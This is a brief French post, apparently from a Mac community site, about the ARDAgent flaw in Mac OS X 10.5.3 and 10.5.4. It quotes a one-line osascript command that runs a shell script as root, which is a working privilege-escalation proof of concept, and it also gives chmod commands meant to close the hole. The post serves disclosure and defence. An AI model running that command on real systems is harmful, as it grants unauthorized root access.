Une faille de sécurité a récemment été découverte, relayée par l’ensemble des sites de la communauté Mac. Cette faille liée au programme ARDAgent escalade les droits du super administrateur, root, par une simple commande Applescript :
$ osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘
root
Si elle pouvait ne pas fonctionner en 10.5.3 chez certains, en 10.5.4, au lieu d’un correctif de sécurité, la faille est finalement activée.
Différents correctifs sont proposés sur macosxhints.com, notamment :
$ sudo chmod 755
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
[Màj] Si vous utilisez Apple Remote Desktop Admin, cette commande de changement de droits sur ARDAgent empêchera son lancement.
Remote Desktop Admin se lancera avec cette seconde ligne de commande et la faille ne semble pas s’exécuter.
$ sudo chmod +s
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
Latest Comments
RSS